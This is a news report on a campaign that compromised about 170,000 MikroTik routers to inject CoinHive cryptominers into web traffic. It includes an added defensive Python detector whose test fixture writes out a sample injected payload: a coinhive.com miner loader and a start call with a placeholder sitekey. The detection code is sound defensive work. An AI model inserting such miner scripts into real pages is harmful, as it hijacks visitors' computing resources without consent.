A hacker has managed to compromise more than 170,000 routers made by MikroTik and uses them to inject browser-based cryptomining scripts into legitimate websites visited by users.
According to Simon Kenin, a researcher at Trustwave who spotted and investigated the attack, the hacker is breaking into routers by exploiting a vulnerability that MikroTik patched Apr. 23.
The flaw allows remote users to connect to MikroTik devices using a special management utility called Winbox and to bypass authentication. They can then download configuration files and decrypt the username and password for the administrative account, gaining full control.
In the attack investigated by Kenin, the attacker abuses MikroTik’s web proxy functionality to inject CoinHive cryptomining software into websites accessed by users who access the internet through networks served by the compromised routers.
MikroTik is a Latvian company that makes consumer and enterprise-grade routers and wireless networking devices. Its equipment is used by home users, companies, government agencies and ISPs around the world.
Even though CoinHive’s creators market the service as a legitimate way for website owners to earn money, it is also frequently abused by hackers who inject the script along with their private key into other people’s websites without authorization.
Kenin found that a script with a particular CoinHive “sitekey” was being injected into web traffic by around 70,000 MikroTik routers, mostly from Brazil. However, the attack later expanded internationally and now affects more than 170,000 routers.
In some cases, the script is only injected into error pages. But in others, it’s injected into every single web page opened by users. Some users had their home or business routers hacked, but other injections are done through ISP routers and affect larger populations.
Kenin also found a website that served the CoinHive script and the attacker’s unique sitekey even when it was accessed from networks that didn’t use MikroTik routers. It turned out that the web server hosting the site was itself behind a compromised MikroTik router, so the attack works in both directions: It affects users behind MikroTik routers when they access websites on the internet, and internet users when they access websites hosted behind MikroTik routers.
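The injection described above is visible to a defender in the page itself: a client behind a compromised router receives the origin's HTML plus an extra script that loads the miner and another that starts it with the attacker's sitekey. The following is an added example (not code from Trustwave, Kenin or MikroTik) showing how to spot such scripts and, where a clean copy of the page can be fetched over a path that avoids the suspect router, how to diff the two copies to isolate what was inserted in transit. The HTML and the sitekey value are constructed for the example; the real sitekey reported by Kenin is not on this page and is not reproduced here.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hostname of the miner library and the constructor it exposes, as named in the article.
MINER_HOST = re.compile(r"(^|\.)coinhive\.com$", re.IGNORECASE)
SITEKEY = re.compile(r"CoinHive\.Anonymous\(\s*['\"]([A-Za-z0-9]+)['\"]")


class ScriptCollector(HTMLParser):
    """Collects every <script> element: its src attribute and its inline body."""

    def __init__(self):
        super().__init__()
        self._in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self.scripts.append({"src": dict(attrs).get("src"), "body": ""})

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here because HTMLParser treats <script> content as CDATA.
        if self._in_script and self.scripts:
            self.scripts[-1]["body"] += data


def extract_scripts(html):
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    return collector.scripts


def find_miner_scripts(html):
    """Return one finding per script that loads the miner library or instantiates it with a sitekey."""
    findings = []
    for script in extract_scripts(html):
        src = script["src"]
        host = urlparse(src).hostname if src else None
        loads_miner = bool(host and MINER_HOST.search(host))
        match = SITEKEY.search(script["body"])
        if loads_miner or match:
            findings.append({"src": src, "sitekey": match.group(1) if match else None})
    return findings


def injected_only(observed_html, reference_html):
    """Scripts present in the copy seen through the suspect path but absent from the reference copy.

    The reference copy is assumed to have been fetched over a path that does not traverse
    the router under suspicion (for example from the origin host itself).
    """
    reference = {(s["src"], s["body"].strip()) for s in extract_scripts(reference_html)}
    return [s for s in extract_scripts(observed_html)
            if (s["src"], s["body"].strip()) not in reference]


# Constructed clean page, standing in for what the origin server actually sends.
REFERENCE_HTML = """<html><head><title>Example shop</title>
<script src="/static/app.js"></script></head>
<body><h1>Welcome</h1><script>console.log("page ready");</script></body></html>"""

# Constructed copy of the same page as a client behind a compromised router would see it:
# the miner loader and a start call carrying the attacker's sitekey have been appended.
# The sitekey is a placeholder, not a real key.
OBSERVED_HTML = REFERENCE_HTML + """
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('EXAMPLESITEKEYNOTREAL0'); miner.start();</script>"""


if __name__ == "__main__":
    for finding in find_miner_scripts(OBSERVED_HTML):
        print("miner script:", finding)
    for script in injected_only(OBSERVED_HTML, REFERENCE_HTML):
        print("injected in transit:", script["src"] or script["body"].strip())
```

Run against real traffic, `find_miner_scripts` alone is enough to flag a page, and the extracted sitekey is the value to pivot on when grouping affected networks, since every router in one campaign injects the same key. The diff in `injected_only` is what separates a router in the client's path from a server that is itself behind a compromised router: if the reference fetch from a clean vantage point still contains the miner, the injection is happening on the server side of the connection.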
“Let me emphasize how bad this attack is,” Kenin said in a blog post. “The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end user computers, they would go straight to the source: carrier-grade router devices. There are hundreds of thousands of these devices around the globe, in use by ISPs and different organizations and businesses, and each device serves at least tens if not hundreds of users daily.”
This means that even if the attacker restricts his injections to error pages, he would still potentially get millions of daily loads of his CoinHive script and sitekey.
This attack highlights how important it is to keep router firmware updated and why such devices are an increasingly attractive target for hackers. Cybercriminals can use compromised routers to launch distributed denial-of-service (DDoS) attacks, spy on users’ web traffic and steal credentials, redirect users to phishing pages when they attempt to visit legitimate websites, attack other devices on their local network and, as seen in this case, hijack users’ browsers and computing resources for cryptomining.
If you have a MikroTik router that you haven’t updated, please do so as soon as possible. It’s also a good idea to reconfigure it and change the usernames and passwords for all of its accounts.